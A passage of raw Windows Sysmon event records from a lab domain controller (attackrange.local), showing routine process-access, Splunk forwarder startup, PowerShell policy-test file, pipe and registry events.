09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5400-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.589{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD4-6151-5400-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.592{5EBD8912-8CD4-6151-5400-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.542{5EBD8912-8CD4-6151-5300-00000000FD01}37163740C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.527{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.527{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.511{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.511{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:20.495{5EBD8912-8CD4-6151-5100-00000000FD01}3656\PSHost.132772080200754624.3656.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001053851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.480{5EBD8912-8CD4-6151-5100-00000000FD01}3656NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_h3qujwuq.hst.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.480{5EBD8912-8CD4-6151-5100-00000000FD01}3656NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_j0uvl4cp.ukt.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.480{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_j0uvl4cp.ukt.ps12021-09-27 09:20:20.480 10341000x80000000000000001053848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.401{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001053847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:20.354{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b380-0xe49f4e5b) 10341000x80000000000000001053846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5300-00000000FD01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W